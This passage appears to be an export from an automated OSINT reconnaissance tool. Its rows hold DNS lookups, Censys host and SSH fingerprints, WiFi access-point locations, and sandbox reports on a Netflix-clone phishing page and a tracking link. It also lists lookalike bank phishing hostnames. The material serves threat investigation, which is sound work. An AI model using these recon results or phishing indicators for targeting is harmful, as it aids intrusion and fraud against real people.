"Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, 
u'threat_level': 0, u'type': 8, u'description': u'"Cab4009.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab4009.tmp]- [targetUID: 00000000-00003016]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 dat | 185.199.110.153 |
| 2023-05-12 02:44:14 | IP Address | No | DNS Resolver | 55 | 0 | 1 | 0 | None | 172.67.135.9 | ayhu.xyz |
| 2023-05-12 02:52:59 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://nwapi2.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi2.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:57 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2a06:98c1:3120::1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 221480 (Net ID: 00:02:2D:22:14:80) | 34.0544, -118.244 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha1-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:03:42 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01101101.github.io |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 5 | 0 | 1 | 0 | None | http://ayhu.xyz/ | ayhu.xyz |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Montreal, Quebec, H4X, United States, North America |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:7C:01:7C) | 52.3759, 4.8975 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:443 | 87.248.157.102 |
| 2023-05-12 02:45:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://kuldeepsuthar007.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kuldeepsuthar007.github.io/netflixclone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b18_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b18_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b18_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b18_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2840"\n "IsoScope_b18_ConnHashTable<2840>_HashTable_Mutex"\n "IsoScope_b18_IE_EarlyTabStart_0xb48_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b18_IE_EarlyTabStart_0xb48_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.23.52:443"\n "142.251.46.234:443"\n "45.57.90.1:443"\n "162.55.233.23:443"\n "203.192.208.114:443"\n "142.251.32.35:443"\n "104.26.5.108:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pngimg.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "kuldeepsuthar007.github.io"\n "occ-0-4023-2164.1.nflxso.net"\n "pngimg.com"\n "pro.fontawesome.com"\n "www.freepnglogos.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "netflix.com from your personal computer or on any" (Indicator: "dir "; File: "netflixclone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', 
u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "netflix_PNG15_1_.png" has type "PNG image data 110 x 200 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded 
OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm21llEw_1_.woff" has type "Web Open Font Format TrueType length 76672 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrJJLedA_1_.woff" has type "Web Open Font Format TrueType length 76604 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmv1plEw_1_.woff" has type "Web Open Font Format TrueType length 76404 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmr19lEw_1_.woff" has type "Web Open Font Format TrueType length 76076 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmy15lEw_1_.woff" has type "Web Open Font Format TrueType length 75364 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmg1hlEw_1_.woff" has type "Web Open Font Format TrueType length 75268 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm111lEw_1_.woff" has type "Web Open Font Format TrueType length 74932 version 1.1"- [targetUID: N/A]\n "pxiAyp8kv8JHgFVrJJLmE3tG_1_.woff" has type "Web Open Font Format TrueType length 72432 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm81xlEw_1_.woff" has type "Web Open Font Format TrueType length 71652 version 1.1"- [targetUID: 
N/A]\n "pxiEyp8kv8JHgFVrFJM_1_.woff" has type "Web Open Font Format TrueType length 66572 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDz8V1g_1_.woff" has type "Web Open Font Format TrueType length 66448 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLFj_V1g_1_.woff" has type "Web Open Font Format TrueType length 66376 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLEj6V1g_1_.woff" has type "Web Open Font Format TrueType length 66232 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLGT9V1g_1_.woff" has type "Web Open Font Format TrueType length 65760 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLCz7V1g_1_.woff" has type "Web Open Font Format TrueType length 65616 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLBT5V1g_1_.woff" has type "Web Open Font Format TrueType length 63856 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrLPTedA_1_.woff" has type "Web Open Font Format TrueType length 62300 version 1.1"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002840]\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002840]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section 
info"- [targetUID: N/A]\n "~DF219ECD0E1D500FC9.TMP" has type "data"- Location: [%TEMP%\\~DF219ECD0E1D500FC9.TMP]- [targetUID: 00000000-00002840]\n "~DF0C0FBE77418B3702.TMP" has type "data"- Location: [%TEMP%\\~DF0C0FBE77418B3702.TMP]- [targetUID: 00000000-00002840]\n "~DFB2A7803A8671EBE5.TMP" has type "data"- Location: [%TEMP%\\~DFB2A7803A8671EBE5.TMP]- [ | 185.199.111.153 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Germany | Frankfurt am Main, Hesse, HE, Germany, DE |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | unsplash (Category: images) https://unsplash.com/@login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pgi50 (Net ID: 00:01:21:10:89:70) | 37.7813933,-122.3918002 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | netcraft.com |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eBOS (Net ID: 00:14:6A:5B:53:93) | 32.8608, -79.9746 |
| 2023-05-12 02:57:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://injectitlimited.cmail19.com/t/i-c-tiirkhydn', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"injectitlimited.cmail19.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"injectitlimited.cmail19.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar572B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3348"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_IE_EarlyTabStart_0xc80_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_ConnHashTable<3348>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d14_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d14_IE_EarlyTabStart_0xc80_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"184.72.15.88:80"\n "35.229.48.116:443"\n "23.61.169.89:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "J81AH7HB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J81AH7HB.txt]- [targetUID: 00000000-00003348]\n Dropped file: "DDH1BHOS.txt" - Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\DDH1BHOS.txt]- [targetUID: 00000000-00003348]\n Dropped file: "ZK24XWU9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZK24XWU9.txt]- [targetUID: 00000000-00003348]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab572A.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003348]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003488]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "J81AH7HB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J81AH7HB.txt]- [targetUID: 00000000-00003348]\n "_A642BCC0-43D5-11ED-9763-08002704A352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF1789E30B0526E037.TMP" has type "data"- 
Location: [%TEMP%\\~DF1789E30B0526E037.TMP]- [targetUID: 00000000-00003348]\n "Tar572B.tmp" has type "data"- Location: [%TEMP%\\Tar572B.tmp]- [targetUID: 00000000-00003488]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003348]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003348]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: 